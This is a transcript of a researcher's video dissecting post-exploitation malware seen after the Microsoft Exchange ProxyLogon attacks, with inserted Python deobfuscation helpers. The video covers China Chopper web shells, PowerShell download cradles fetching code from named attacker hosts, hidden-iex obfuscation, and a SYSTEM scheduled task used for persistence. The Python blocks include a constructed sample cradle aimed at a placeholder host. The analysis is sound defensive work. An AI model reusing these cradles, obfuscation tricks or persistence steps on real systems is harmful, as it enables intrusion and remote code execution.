So I think there is a certain amount of, or an element of, risk in putting out a video like this that is so timely and current, and obviously this is still a breaking and emerging thing. I don't want this to be something that gets other threat researchers or other analysts in a tizzy; I don't want anyone to be upset or going crazy. All of the stuff that I'm going to end up sharing in this video is public, right? And I care specifically much more about the technology, the tradecraft, the technical analysis, the techniques that they're using on the keyboard and stuff like that when we're looking at bad guys, hackers and threat actors. What I do want is for this video to be all about education, bringing this into the spotlight, showcasing it and raising awareness, because I think that we do this sort of stuff, threat research, analysis, threat intel, so that we can better the community, right? So that everyone else is in the know and aware of this stuff. So again, this will be just showcasing technology and what we're seeing. I will note, of course, that, look, disclaimer: I don't know all the things, and if I misspeak or if I'm wrong, that's totally cool, I hope. Fingers crossed. Please be cool with that; let me know in the comments and share. And obviously, as I said, this is sort of an ongoing thing, and it's still developing, so maybe the stuff that I end up showcasing will be out of date and not applicable in the next day, or whenever you happen to watch this video, or as new things develop. And obviously, if you see anything new or interesting or peculiar, please do share. There's an email in the description. You can hit me up anywhere online: Discord, Twitter, LinkedIn, blah blah blah. You know, you can find me.
It's pretty easy to cyber-stalk me, and there's the risk again, right? So, anyway, enough of me blabbering; that was a two-minute introduction that was not necessary. But in this video I want to showcase some of the post-exploitation from the Microsoft Exchange ProxyLogon, HAFNIUM incident, skyfall, etc. So I just want to be showcasing the technology and the education piece of that, and some of the post-exploitation stuff that we're tracking, or at least what we've seen so far. So I'll get to my computer screen here and we'll take a gander. I have my GitHub gist page open and available, and I'm gonna be poring and scrolling through here. So this is, as I mentioned, off the tails of the Microsoft Exchange vulnerability that came out and has been being exploited, and is still actively being exploited. So recently I just updated this one here for the China Chopper web shell. If you're interested in some of this other stuff, or if I'm not laying out the background and the backdrop or setting the stage properly here: the exploitation of these Microsoft Exchange servers comes with a sort of indicator of compromise, right, the IOCs, in that you might find web shells, ASPX web shells, in a specific file location, either through the default installation of Microsoft Exchange or shown through in an IIS web root here. Now, when this broke, when this went down, there were practically no antivirus or EDR programs or solutions that would stop this, because, oh, web files in the web root directory, that sounds totally normal, no cause for concern or suspicion. Keep in mind, it's the contents of these web files that is spooky and sketchy. So I will showcase this, and I've done plenty of work with this through my own day job, so if you're interested you can certainly dig up some other stuff in case I don't explain this all that well. But I just updated this with some of the other recent findings that we've seen here. So...
Tons and tons of stuff, right, but the ASPX shells that have that China Chopper structure. And actually, let me Google that, China Chopper, to give a little bit more color behind that, right. This is an article that FireEye put out back in 2013, so this is a known thing, and some of you that play capture the flag, or some of you that are into the scene, look, you know, it's the equivalent of a PHP one-liner thing where you just fire up and pass in system with an HTTP argument, like a GET variable or a POST variable. It's literally the exact same idea, in that, hey, you just end up passing along a variable, or an HTTP GET parameter argument. We're calling it a key or a password, because obviously you or the attacker would need to know what the name of that key or that variable happens to be, and that can sort of allow for some mental gap, as only the people that know that password will be able to execute code there. But that's it. There it is in ASPX, and they have a rendition in PHP. This also has a lot of other functionality, and I think some kind of whole front end for how you can do things with this; that's what a lot of this stuff that FireEye was showcasing here is. But it boils down to just that syntax of, like, yo, taking a variable from the HTTP request and executing it like it's a command, you're operating from the command line, etc., etc. Do they have the syntax for the PHP one? Yeah, yeah. So there's ASPX, which is what we are seeing, and of course PHP, as you've seen it, like an eval or an exec passed through system, etc. But just an HTTP variable.
That's all that it boils down to. Okay, that was enough of that backdrop, sorry. But we're seeing all of these different potential web shells, and we try to create a list of them, because a lot of them tend to be just random, like A through Z, uppercase, lowercase, with some digits in there, or some of them, and we tend to call that a random file name. But some of them also tend to be static, like a T, or an error page, or some are as ballsy as to say shell, load, outlook, en, etc., etc. HTTP proxy support with the zero to be leaked, and you can see the syntax here that is just doing a weird job and not showing, but of course you can see that key, or what it ends up moving through. Some of these I think are really interesting, because there are a few cases where you'll see, oh, at least an effort or attempt to maybe do some evasion, where you concatenate the strings for the word "unsafe" as if that's gonna get through some signature detection. Maybe it does, maybe it will; again, do not know. Other ones are also interesting where they're getting a whole request object out and saving a file out of it. I do see some that I think are just using another PowerShell request or payload. Let me pull it down; I think it's down here below. But that's the normal one, that and 09, etc., although we've seen other variations of it, and you can see some of the static ones like orange or bingo or ananas. Where is the other neat stuff? There it is, there it is, there it is. So eval System.Text.Encoding UTF8 GetString FromBase64, so you base64-encode some of these, and it's a whole random hash for that variable, for that HTTP request, one of these. I'm not exactly positive.
It's like maybe they're just making a mess, who knows. And some of them are also peculiar. I think this http://f/ isn't a thing, obviously; checking out the etc hosts file for the victims, for the target compromised machines, there is no domain f, and there isn't just one on the internet, right? I'm pretty sure it's just to cram it into the ExternalUrl, which was that field in the OAB directory configuration thing, to look like a URL, but then, because this is going to end up being rendered as ASPX, just jam in the script tag here, because that's actually what's going to be in it, being executed server-side anyway. Enough backdrop. We're like ten minutes into the video and we haven't even gotten to anything interesting. So this is the web shell. That means the attackers have remote code execution; they have access and availability to run commands and operate on that machine. Boom. This thing affected like all versions of Microsoft Exchange, all of those servers are typically publicly exposed to the internet, bad, and there are people just spraying and praying; the bad guys are just like, hey man, let's whack the whole internet with this thing, let's see what falls out. So hence the scramble, hence the concern, and maybe I'm hyping this thing up too much, but we kind of thought it was a big deal. So now, and this is breaking, right, this has been going on for the past week and a little bit earlier, when it all started to fall through, so maybe I'm late on getting this video, but now we're seeing post-exploitation. Now we're seeing the techniques and tradecraft that follow this. So what is going to go down? What are the hackers gonna do? Are they gonna drop ransomware? Are they just gonna exfiltrate data? Are they gonna, I don't know, steal things to sell out on the dark web, spooky-wooky? Are they going to use a crypto coin miner, just start harvesting bitcoins, become part of a botnet? I don't know. I don't know.
Anyway, let's get to one of the indicators of compromise, right. We saw the web shell, but now what commands are the attackers going to run on that web shell? So I have this one that I want to bring us down the rabbit hole with, and I call this file stage0.cmd. So, catting this out to take a look at what we got here. This was just one of the logs, one of the things that we had seen that was detected; I think Defender actually ended up seeing this and quarantined it, they removed it. But: cmd, run of the command prompt, right, /c so we run one command inline passed in as its arguments, and we kickstart PowerShell. powershell -ep for execution policy, where we bypass the execution policy, and -e for enc or encoded, so you can pass in an encoded command, and it's base64 encoded, right? So we can see all this gobbledygook, all this nonsense, all this techno-jargon. It's base64, so we can pretty easily just go ahead and decode that, right? That's what base64 just lets us do. So I will go ahead and cat, or excuse me, I'll echo that out, copy and paste that, and I will pipe it to base64 -d, or minus d, so we can decode. Ah, and this is what came out. So IEX, or Invoke-Expression, right, and Invoke-Expression will execute code. It's essentially an eval statement, right? The argument or the string that is passed to it will run as if it were PowerShell syntax and a command. Now we create a New-Object Net.WebClient so we can access the internet, and we download a string present at this location, http p.es 09; I'm gonna call it "pest online" even though obviously that's not what that says, but that's just an easy thing to name it. We can address that problem. And it goes to p with an HTTP variable e included as a little GET variable there, the question mark. So what is that thing? We kind of want to know, hey, what is that? What is on that page? Does that page still exist?
So I'm gonna go ahead and copy that syntax, and I will simply try to see if that actually still exists. No. Okay, so it isn't a thing, at least not right now. I'll bring this to you because I will lay the foundation, in that we went ahead and contacted the owners of that; we tried some whois, we tried some Shodan to get ideas of what this thing is. It was a DigitalOcean IP address, as I'm sure you're seeing a trend in DigitalOcean, a cloud provider that these hackers use; they're one of choice. And I think Namecheap was the one that had the domain, so we notified them, and then they stopped it; they pulled it down, from what I can see now. But I did save the original payload and the tech that came from it, so I want to showcase some of that now. Again, all of this is present here on my GitHub gist; you can see I made these a couple days ago when I just tried to store all this and make it visible and accessible to other people. So this is the ps online, or "pest online", right, we'll call it, and their stage one. Now if we go check this out, there's a lot here. I don't know if you can see that horizontal bar, but boom, plenty of stuff. So let me grab that syntax, and I will simply call that, what do we want to call that, stage one, right, stage1.ps1. We'll slap it in here, and of course it starts with an Invoke-Expression. Now let me cat this, because it might be a little bit easier to see. It's just a wall of more base64. However, it's going to end up creating this as a MemoryStream, taking that base64, decoding it and also deflating it with some compression algorithm. Normally you'll see gzip being used to decompress some stuff; Deflate, that's another variation, right? And obviously at the very, very end we'll go ahead and decompress it and read to the very, very end of it, and it'll execute that because of the Invoke-Expression at the very, very top.
So this structure is very normal for another PowerShell stager. Question is, okay, what is actually in this code? Because we're using Invoke-Expression, we know at the very end of the day this is going to end up translating out to PowerShell syntax, more PowerShell code. Well, we want to know what that is. So if we were to try and defang this, sure, we could grab this base64 syntax all on its own, we could decode it, we could deflate it with, I guess, I think zlib, right? Maybe I'm wrong in that; yell at me if I am. And then we could just do it ourselves, or, because it's PowerShell syntax, we can just let PowerShell decode it, as long as we are certain we have removed that Invoke-Expression, so we don't actually execute this, so we don't run it on our own system. So I will copy all this and I'm gonna fire it up. No, I think I need a shift-control-something, and I think I'll throw it in PowerShell, right? So if I'm running this in PowerShell on Linux, I don't exactly know, obviously, because we're just decoding this data; if we were to actually end up running something, then if it uses Windows internals or Windows stuff it will just fail. That's the gamble, the dice roll, that you take when you try and run some of this stuff in PowerShell on Linux. So I also have a Windows VM prepared and ready for you, but in this case it should totally be fine. So let me paste all this in. You can see I have removed my Invoke-Expression; we're just starting with this object here. So I just want to see what this returns, I want to see what comes out of this. I'll hit enter, and there we go. Now we have more code and more syntax, and it looks like this is actually pretty telling. So I will grab this; oh, and I actually didn't finish, I didn't get to the very, very top here. There we go.
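The decode-and-deflate steps just described, done offline in Python as an added example (not code from the video or the gist): it pulls the base64 out of a powershell -e stage and out of a FromBase64String/DeflateStream stager and inflates the blob itself instead of letting PowerShell do it. The cmd line, the cdn.example.invalid URL and the stage-2 text are constructed samples, not the live payload.

```python
import base64
import re
import zlib

# powershell -e / -enc / -EncodedCommand <base64>; the payload is UTF-16LE text.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# The blob inside [Convert]::FromBase64String('...') in the deflate stager.
B64_BLOB = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# The URL handed to (New-Object Net.WebClient).DownloadString('...').
CRADLE_URL = re.compile(r"DownloadString\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
# Leading IEX / Invoke-Expression: the part you strip so PowerShell only returns the string.
LEADING_IEX = re.compile(r"^\s*(?:iex|invoke-expression)\s*", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script behind powershell -e <base64> (stage 0 -> stage 1 cradle)."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def cradle_urls(script: str) -> list:
    """Every DownloadString URL in a stage: the network IOCs to block and hunt for."""
    return CRADLE_URL.findall(script)


def defang_iex(stage: str) -> str:
    """Drop a leading IEX so the expression evaluates to text instead of running."""
    return LEADING_IEX.sub("", stage, count=1)


def inflate_stager(stage: str) -> str:
    """Decode and decompress a FromBase64String + DeflateStream stager without PowerShell.
    .NET DeflateStream is raw DEFLATE with no zlib/gzip header, hence wbits=-15."""
    m = B64_BLOB.search(stage)
    if not m:
        raise ValueError("no FromBase64String blob found")
    return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("utf-8")


def build_constructed_samples():
    """Constructed stage 0 / 1 / 2 chain shaped like the one in the video; the host
    cdn.example.invalid is a placeholder, not an indicator from the incident."""
    stage2 = "$dt = Get-Date; $path = Join-Path $env:TEMP 'ccc.log'"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)          # raw DEFLATE, like .NET
    blob = base64.b64encode(comp.compress(stage2.encode()) + comp.flush()).decode()
    stage1 = ("IEX (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream("
              "New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + blob + "')),"
              "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/p?e=1')"
    stage0 = "cmd /c powershell -ep bypass -e " + base64.b64encode(cradle.encode("utf-16-le")).decode()
    return stage0, stage1, stage2


def unwrap_chain(stage0: str, fetch) -> list:
    """Walk stage 0 -> 1 -> 2 and return every recovered stage as text.
    fetch(url) stands in for the download; here it is fed from the constructed samples."""
    cradle = decode_encoded_command(stage0)
    stages = [cradle]
    for url in cradle_urls(cradle):
        stage1 = fetch(url)
        stages.append(stage1)
        if B64_BLOB.search(stage1):
            stages.append(inflate_stager(stage1))
    return stages


if __name__ == "__main__":
    s0, s1, s2 = build_constructed_samples()
    for i, text in enumerate(unwrap_chain(s0, lambda url: s1)):
        print("stage %d: %s" % (i + 1, text[:80]))
```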
There it is. Copy that, and let's just get another terminal over here, because we'll keep PowerShell open up there. I don't think I have a profile set up to change that to blue, but let's get, what is it, stage two now. Slap that in, and now we're seeing some more new, interesting things. We start with some enumeration; the bad guys are gonna want to know, what is the computer that they landed on? They retrieve the MAC address with a getmac. Is that something that's defined in here? No. Well, that looks like a cmd command, looks like an old-school command. Does that actually work? Fire up my Windows VM. So now I just hopped over to a Windows virtual machine, right? I have Windows Terminal open, but it started me off in PowerShell. I want to get into cmd, because that could end up being... I don't think I have the stinking shared clipboard on in this. I had to reset this VM some time ago because it, there we go, it was just not behaving with Windows updates or whatever. Let's run this. Okay, and there we get a MAC address, so that can be poured in. We skip the first line, ConvertFrom-Csv, get the header mac and expand on that mac. So it just grabs the MAC address; that's all that that variable is gonna end up doing. Then we try, sorry, bumping around, if $global:psexec can be executed, exe flag is Flice, I don't even know how to pronounce that. I think that's just checking if psexec is a thing. I'm not a thousand percent positive there's nothing malicious in that, so let's just go do it. There we go, I'll exit out of cmd and get us back into PowerShell, and yeah, paste it anyway, who cares. I'm just kidding; you should care. Okay, looks like that's okay. It does return that object, and is exe flag set? No, it is true. It is not place unless place is already defined, but I'm pretty sure it wasn't. Name, of course.
We'll still be a thing. Okay. Then we get the date, we store it in dt as a variable; the path is gonna end up being our environment variable for the temporary location, and it puts it in ccc.log. Okay. Flag as to whether or not that exists, because we're just testing the path; that will go ahead and verify, hey, does that file exist already? Indeterminate. Let's try to run some of those now. Of course dt is our current date, and what else did we just choose? Path. Yep, path should have evaluated out fully to my temporary directory, which it does, and we called it, what, flag, and that is false because it does not yet exist. Okay, so let's get back to this here. permit looks like it's going to end up checking the current identity and checking if it is an administrator, right? So if it is in an administrator role, the key that it builds out is going to be the MAC address, which we've just determined, AV, which it doesn't look like, I don't think it ended up getting, version, did I miss some of the code here? Get-WmiObject gets the version and the architecture for the 32-bit or 64-bit, oh, and the domain and user and PowerShell presence. There's a lot. Okay, okay. We can explore this in the gist again, and I have that code still publicly available, so let me just verify that. Get back to our Firefox here, and this should be what we called stager zero two. Okay, no, and that's the exact same syntax. I didn't see that AV variable be defined or used yet. Huh, that's fine. Okay, then if we do not have our logging set up, we will create it, and if we are an administrator, seemingly from the permit variable up here, we'll go ahead and do the same PowerShell download cradle for IEX, Invoke-Expression, now downloading from cdn.chatcdn.net with p, hig set to the date, dt is set to date. Okay. And the text that returns from it, it retrieves as bytes, base64-decodes it, and then sets up a service, right? No, no, no, a scheduled task.
So schtasks is going to be the argument: /create, running as user SYSTEM, schedule configuration with the minute, for every 45 minutes we will run a task named winnet, W-I-N-N-E-T, /TR, and that syntax and code will be PowerShell running the code that it had previously downloaded from cdn.chatcdn.com, of course bypassing it and encoding it, and /F. Ah, and then it goes ahead and creates it, so /file path with the scheduled task, creating that scheduled task. Now that is persistence, right? So every 45 minutes it will go ahead and run something as the SYSTEM user, and it's going to be variable on what is returned from this domain. And the hig variable isn't actually set to anything; it's just including the date time in the request, but it's not being used as a variable, it's not being set equal to anything. So maybe they're just using that to keep track of the timing as to when they're seeing these responses, and of course every 45 minutes. Well, then they don't even need to run this request every 45 minutes; they've just downloaded that persistent code from that location. Ah, okay. Otherwise, if it's not an administrator, it will download again from cdn.chatcdn.net, low as the argument and dt being the date one more time, but now they aren't using that /RU, or the run user, as SYSTEM, because it's just going to end up running in the context of the current user, so it's not an administrator and cannot use that system level. There we go. We should go ahead and explore what that location is at cdn.chatcdn. Scheduled tasks run for winnet, task name winnet, and that's its persistence that it has kickstarted and is now in action, executing every 45 minutes. We should go find out what that is.
We sleep for a random amount of time. We try to Get-WmiObject for the processes that are running, Select-String pattern for DownloadString, so it looks like it's trying to find its own code in there. If run.length is less than zero... so if it actually found a result and it has not been executed, it creates this onps variable, which is an argument again to cmd.exe: /c running PowerShell, no profile, window style hidden, execution policy bypass, and -c for the command that we want to run, and it's going to run another download cradle, downloading from that IP address with an update.png and the key that it has uncovered from all of our MAC address and information, everything that it already extracted with its own enumeration. Ah, okay. And then it will execute that onps, and otherwise it tries to kill $PID. Was PID ever defined, or is that just a PowerShell thing? There's no way that's just a PowerShell thing, is it? $PID. Oh. Today I learned, right, TIL. That's why we do this, ladies and gentlemen. So let's go, let's go see if this thing actually exists: cdn.chatcdn.net/p, hig, or high, and low. Mmm, so that one does exist. When we were to supply low, I think we get... are these the exact same? Let's try and redirect that out to hig, and let's redirect that to low, and I'm not including the date in here; I don't know if it will actually make any difference, but can I cat hig? Is that now... what about low? If I diff hig and low, they're the exact same file. sha256sum hig and low. Yeah, literally the exact same, so no difference whether or not you are an administrator in that persistence. Now what is that gonna end up doing, right? Let's go ahead and find out. We have that syntax once again, using that PowerShell setup: Invoke-Expression, DeflateStream, FromBase64String.
Let's get everything other than that Invoke-Expression, and let's bring down our PowerShell prompt from before, slap that in, and now we have this thing. Okay. Goodness. Is this thing fully reversed? This is disgusting. Let's save that and let's call that persistence.ps1, slap all that in. Mm-hmm, mm-hmm. Invoke-Expression, joining regular expressions that match that, which is totally in reverse. Kill that thing. This whole thing is reversed; you can see Start-Process over and over again. Does this actually ever reverse it? Yeah, yeah, yeah: right to left. All right, so rather than running Invoke-Expression on this one more time, let's be dangerous. Nerf that; I'm removing the parentheses that were following it, so now I can try to just slap this into PowerShell one more time. Here we go. There we go. And this is still really messy to read. Is this the exact same code? I see that getmac flag in there. Subtle. Decoded persistence, stop, ps1. Oh gosh, this is gross. They're gonna end up using semicolons, though, because it's all inline, so what we can do... are they gonna end up using semicolons? What the f? You know what, let's split on the plus sign and then make it a newline plus sign, so it's a little bit more readable. Not that that's really readable whatsoever, but this is the exact same setup. They're getting the MAC address again, they're setting the exe flag. What is this, what is this xwh, though, that I'm sure is being replaced? Yeah, it totally is, because that's going to end up being the prefix for a variable. You can see that b code that we saw earlier; there's that chat one more time, exactly that chatcdn domain, and all this replacing is going to end up actually happening. So you know what, this needs to be run again. This isn't actually going to be executed. Actually, actually, be super duper careful with this one. I see it right here.
I see, to the very, very end, it's piped into an ampersand with $PSHOME index 4 and $PSHOME index 30 and an x. That should be iex. Let me, let me check this out. Let's grab the syntax, let's get over to our Windows virtual machine, and I'll slap this in. Thanks, Windows, I really appreciate that. So $PSHOME. This is a well-known trick. $PSHOME, let's get this variable. You can see here, $PSHOME index 4; there's the original string, that looks pretty benign, it's just where your PowerShell home is going to end up living and existing. But $PSHOME index 4 is an i, and check it out, $PSHOME index 30 is an e. So when you concatenate that all together, you get the value iex. And I love that Windows actually knew that; AMSI probably was like, na na na, don't let that execute, because that's going to actually run it. That is a known trick at the very, very end: they'll try and hide the iex by wrapping it in other variables and extracting an individual index out of that. So if we were to go ahead and get replacing this xwh, right, you know what, I'm pretty sure it'll end up just spitting it all out as it is; xwh is going to end up being a dollar sign. So let's remove that iex and of course trust in ourselves, slap it into PowerShell, run that code, and look, this is literally the exact same syntax. Let's set that to PowerShell. It's doing the exact same thing: grabbing the MAC address, expand, try/except, except it doesn't have newlines, which is horrific and hard to read. It doesn't even have semicolons. So what's going on? But there's that again, same IP address, update.png. Yep, yep, yep, setting persistence with winnet, forcing that persistence over and over and over again. Dirty. Okay, okay.
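The two layers just walked through, the RightToLeft regex join that reverses the script and the $PSHOME[4]+$PSHOME[30]+'x' construction of iex, undone in Python as an added example (not the video's or the gist's code). It assumes the stock Windows PowerShell 5.1 $PSHOME path, and the obfuscated script it works on is a constructed sample.

```python
import re

# Assumption: a stock 64-bit Windows PowerShell 5.1 install, where $PSHOME is this
# path. There $PSHOME[4] is 'i' and $PSHOME[30] is 'e'; on PowerShell 7 the path,
# and so the indices, differ, so pass the real value when it is known.
DEFAULT_PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# -join [regex]::Matches("<s>", '.', 'RightToLeft') with a double-quoted <s>
RTL_JOIN = re.compile(
    r"""-join\s*\[regex\]::Matches\(\s*"([^"]*)"\s*,\s*'\.'\s*,\s*'RightToLeft'\s*\)""",
    re.IGNORECASE)
PSHOME_INDEX = re.compile(r"\$PSHOME\[(\d+)\]", re.IGNORECASE)
ADJACENT_LITERALS = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# & 'iex' or . 'iex', optionally parenthesised: Invoke-Expression called via a string
HIDDEN_IEX = re.compile(r"[&.]\s*\(?\s*'iex'\s*\)?", re.IGNORECASE)


def undo_rtl_join(script: str) -> str:
    """Undo -join [regex]::Matches("<s>", '.', 'RightToLeft'): matching every
    character right-to-left and joining them just reverses <s>, so the wrapped
    script is the quoted string read backwards. Unmatched input is returned as is."""
    m = RTL_JOIN.search(script)
    if not m:
        return script
    return script[:m.start()] + m.group(1)[::-1] + script[m.end():]


def resolve_pshome_indices(script: str, pshome: str = DEFAULT_PSHOME) -> str:
    """Replace each $PSHOME[n] with the quoted character it evaluates to, then fold
    'a'+'b' chains into one literal, so $PSHOME[4]+$PSHOME[30]+'x' reads 'iex'."""
    def one_char(m):
        idx = int(m.group(1))
        if idx >= len(pshome):
            return m.group(0)          # out of range for this install: leave it visible
        return "'%s'" % pshome[idx]

    out = PSHOME_INDEX.sub(one_char, script)
    while True:
        folded = ADJACENT_LITERALS.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), out)
        if folded == out:
            return out
        out = folded


def deobfuscate_layers(script: str, pshome: str = DEFAULT_PSHOME) -> str:
    """Apply both passes: un-reverse, then resolve the index-built strings."""
    return resolve_pshome_indices(undo_rtl_join(script), pshome)


def find_hidden_iex(script: str, pshome: str = DEFAULT_PSHOME) -> bool:
    """True when, after undoing the tricks, the script calls & 'iex' (or . 'iex'):
    the string-built Invoke-Expression that a plain grep for 'iex' would miss."""
    return HIDDEN_IEX.search(deobfuscate_layers(script, pshome)) is not None


# Constructed sample, not the live payload: an inner script ending in the
# & ($PSHOME[4]+$PSHOME[30]+'x') call, stored reversed inside the RightToLeft join.
INNER = "('xwhmac = 1').replace('xwh','$') | & ($PSHOME[4]+$PSHOME[30]+'x')"
SAMPLE = "iex (-join[regex]::Matches(\"" + INNER[::-1] + "\",'.','RightToLeft'))"

if __name__ == "__main__":
    print(deobfuscate_layers(SAMPLE))
    print("hidden iex:", find_hidden_iex(SAMPLE))
```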
I think that's all that we're gonna end up getting out of that. We still have more that we should review and look at, but before I drive onward I do want to note that if we were to Google around and try and research some of this structure... like, I don't know if I'll actually get the hit doing it. I'll go to Google, just to go here, see if it's around. No, that might be too obscure. ccc.log. I'm going to weird places on the internet right now. Okay, let's cut to the chase. This is a known thing; this syntax has actually been seen around. I guess in 2019 Carbon Black put this out. Thanks, Ryan Murphy, kudos to you. This dives into a little bit more malware analysis and actually showcases the whole storyline, so kudos to you, much better than me. But take a look: they do this exact same setup, or it's obviously going to end up being another PowerShell download cradle, but once it pulls itself down, once this PowerShell payload and that download cradle runs, you end up getting some other obfuscated stuff that eventually turns into the exact same syntax that we've seen thus far: iex, for string, mac, getting the MAC address, doing this, literally using ccc.log, using the exact same log file, the exact same code and techniques, creating, where is it, winnet? Yep, it's winnet once again, that persistence, downloading from chat.cdn.net, downloading from a different IP address here, but /update. So this is only one route. Obviously this is only one of the command-and-control post-exploitation techniques that we've seen thus far coming out of the Microsoft Exchange incident, but this apparently is already a known thing. There is research on that from two years ago, so I can link this in the description if you have any interest in reading along on that. But we thought that was, um, what is this? We have apparently already known about this in our world.
So, all right, wanted to showcase that, and I'll share that with you all as well. You might remember, ladies and gentlemen, that we are not yet finished in what we could do with this stage two file, because we checked out cdn.chatcdn.net, but there was one more IP address, there was one more location that we could end up going, right down here, when it tried to execute code coming from this IP address, 188.166.162.201, update.png. It'll include a key, and I don't know if I need to supply that right now. Let's see if we actually get a response without it, and of course, classic, right, we've seen it before: trying to smuggle PowerShell code inside of a PNG file. Look, it's not a PNG file. Let's curl this down, let's see if it still exists, and it does. So, more dirty work in here. Let me actually save this copy of, what is that, stage3.ps1. Now I have this still stored and saved in a GitHub gist. Scrolling back, this was the update.png.ps1, and this is a large file, so if we were to view the full file, I'm just going to copy and save this as well. Oh, we'll save that as other stage3.ps1, that it did include a key when we passed it along. So if I actually check out stage three... what the heck, did curl not actually output that for me? curl's output is -o, isn't it? Yeah, because wget does the -O, capital O, and -o, lowercase o, for curl. stage3.ps1. What's going on? We just saw that output. It's right here. The file is huge, granted; there's a lot of base64. Sorry, sorry, I know this is really painful on human eyeballs. Look at this, look at how far my scroll bar is right now. I mean, it got it. No, no, no, that's actually from hig. Shoot. You can see the previous commands; that was from an earlier one. Maybe for the sake of our own sanity we should, yeah, let's stop. Let's stop, let's just get the one from the gist, and we'll use that other stage3.ps1. Good enough. So what do we got here, ladies and gentlemen?
Same exact setup, ginormous line. Let me actually check that out: ls -la other stage3. This is two and a half megs. Mm-hmm, two and a half megabytes of base64 compressed data. So if we were to see all of this, there's a DeflateStream, all of the noise, the nonsense, going to the very, very end, and there's nothing else in this. So, as usual, let's nerf that Invoke-Expression, copy that syntax and let PowerShell do the magic for us. I'm gonna end up slapping this all in, and it might take a long time. You know what, that was a horrendous idea. At least we look like a real hacker now. Where's my mask? Where's my Guy Fawkes mask? We try to have fun here on this channel. So if any of you guys that are real professionals are watching this video and we got to this point, look, I'm sorry, I started off the video all cool and somber and now I'm just goofing off. All right, I'll pause the video recording and we'll get back to it when this is done. I should have just run this as a script. I'm sorry. Okay, hi. I tried to kill PowerShell to stop that from happening; it didn't work, apparently, so I just ran it and redirected out to a stage four and I opened that up. So before I dive in, though, let me take a look at this. This stage four is now uncompressed, right, decompressed, and we've got three megs. So let's take a look at that guy. Sublime Text is like, I'm trying to catch up with you here, John. But this one I think is neat, and I do want to showcase this to you. So take a look at that first line, first of all. Really wonky, really messy, and this is ginormous. I don't know if you can see my horizontal scroll bar down at the very, very bottom of the screen, but there's a lot going on, and it takes a long, long time to get to the very end of that line. Let me table that for the moment. But scrolling down, we can see other PowerShell syntax that might be continuing on from the very end of that line. But following that, we create this function.
Oh, sorry, I'll scroll down here. dhwe kid. It creates some bytes and variables and all these things here, and some of this is obfuscated, right, and some of it is not, which was weird to me. Like, you can see these functions here: New-PacketSMB2SessionSetupRequest, and it's creating SMB packets, make_smb1_trans2_exploit_packet. I think some of this actually comes from Empire, and I might be wrong in that, but we were hunting around, Googling as to WTF is this thing; I thought we saw some semblances there. But some of them have completely random conventions for how they're naming their functions. Some of them are like a more PowerShell-like verb-noun setup with capitalization, although some of them have the all-lowercase snake case we just saw earlier, and it's just weird. So as I was scrolling through here, and there's a lot, right, there's about three megabytes of all this information, a lot of it is those function names that we saw for SMB. You can see Invoke-SMBC, maybe that's channel. And I won't end up going through a huge analysis on this the way that it stands right now, but I'm going to keep cruising through, because maybe you might have noticed the same thing that I noticed, that I thought was incredibly weird and incredibly strange. So first of all, just to make our analysis somewhat easier and sane, and this is what I ended up doing while I was going through it in real time, is that I would try to look for all these function names. So I'd look for "function" dot whatever and I would just hit Find All, so I'd have them all selected, and I'd copy them out and bring them into a new file, so that way I could look for all the function names. I guess I'll make some of these capital, function... oh, so it's not going to give me that syntax. Whatever.
Oh, it's because of these curly braces. But this at least gave us a decent idea as to what all this code was doing. Now as I scroll down here, some of these are very, very strange. I don't know if you see this: kdhsd, hyphen, there's a string and a comma, and then random base64 all the way at the end, and then it just adds an if statement way off to the side. That didn't make any sense to me, and it wasn't just that one. There were multiple: Make-SMB2, etc., etc., etc. Function main, that would be worthwhile to take a look at. Another new -p, random base64. So looking through that, that kind of tipped me off initially. But as I was continuing to scroll through here and look for interesting things, like I think we saw a "dump patches". Yeah, there's a function called DumpPatches, which is sus. I think there were some other odd ones, but keep an eye out for this weird setup where you have these single quotes and commas and then other random base64 data that makes no sense. That's not normal PowerShell syntax.

So eventually I was staring at this whole big long line at the top here, because it makes no sense as to why that's all there. So I turn off word wrap, and now we have this humongous chunk of all of these numbers. But I was like, that's not hex. That's not decimal ASCII values. That's not octal. There's no representation of that that makes sense when you're looking at that many digits. And eventually I got down to the very, very bottom of those numbers in their pattern there, and I saw this -f, and I thought, huh, what does that do? Is that a thing in PowerShell? Following that is a lot of base64, etc., etc., etc. And scrolling down more and more and more, I thought, okay, let me take all of the base64 that I see. But even some of that base64 has these commas and ending strings here. Like one of these is just the letter b. Great.
That's helpful. So I took all this and I ended up taking all of those commas and replacing them with a newline. Did that actually work? Maybe not a bad example. Yeah, whatever. Forgive me, praying to the demo gods always fails. Anyway, the point that I came to when I was looking at just that base64, as if that was being used: I thought it was really, really weird. I thought, is that actual syntax in PowerShell where you just randomly use -f? So I thought, let's take this string, including the base64, and let's see if we could actually get anything out of it. So I brought it over to Windows 10 PowerShell and tried to paste it in. Yep, do it. Oh god, why did I stinking... Eventually I realized I hit this error. It says "Error formatting a string: Index (zero based) must be greater than or equal to zero and less than the size of the argument list." And I thought, wait a second, error formatting a string? Is that -f literally doing it like an f-string, like the Python equivalent, a format string? And then I realized, oh, this must be doing some f-string, because looking at all these, that makes sense, and tactically with the numbers and the curly braces. And I was trying to find, like, oh, is there a curly brace zero? Which looks like there is, right? I don't know if you can see that down there, just by my face. Is there a curly brace one? Yep. Two? Yep. Three? Yep. Okay, so it was piecing it all together, but what was the largest number in here? Like, between all the base64 strings that we saw just underneath it, how much is that? Is that... there's no way there's 3,000 comma-separated arguments to a format string. Like, I see numbers up to 2679. I think I saw some 3,000 somewhere.
